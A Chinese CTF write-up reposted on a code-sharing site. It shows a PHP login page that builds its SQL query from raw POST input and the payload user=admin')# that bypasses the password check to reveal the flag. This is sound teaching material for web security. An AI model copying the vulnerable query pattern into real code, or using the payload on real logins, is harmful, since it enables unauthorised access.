首页 > 代码库 > SQL注入1
SQL注入1
<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ‘:‘ . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = trim($_POST[user]);
$pass = md5(trim($_POST[pass]));
$sql="select user from ctf where (user=‘".$user."‘) and (pw=‘".$pass."‘)";
echo ‘</br>‘.$sql;
$query = mysql_fetch_array(mysql_query($sql));
if($query[user]=="admin") {
echo "<p>Logged in! flag:******************** </p>";
}
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="http://www.mamicode.com/Username">
<input type=password name=pass value="http://www.mamicode.com/Password">
<input type=submit>
</form>
</body>
<a href="http://www.mamicode.com/index.phps">Source</a>
</html>
trim() 函数移除字符串两侧的空白字符或其他预定义字符。
例如本题双引号里面的都被解析了,所以不用闭合(带双引号)
直接输时是这种情况(发生了过滤)
所以我们直接注入
user=admin‘)#&pass=7321
只管user剩下的注释掉
Logged in! flag:nctf{ni_ye_hui_sql?}
SQL注入1
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。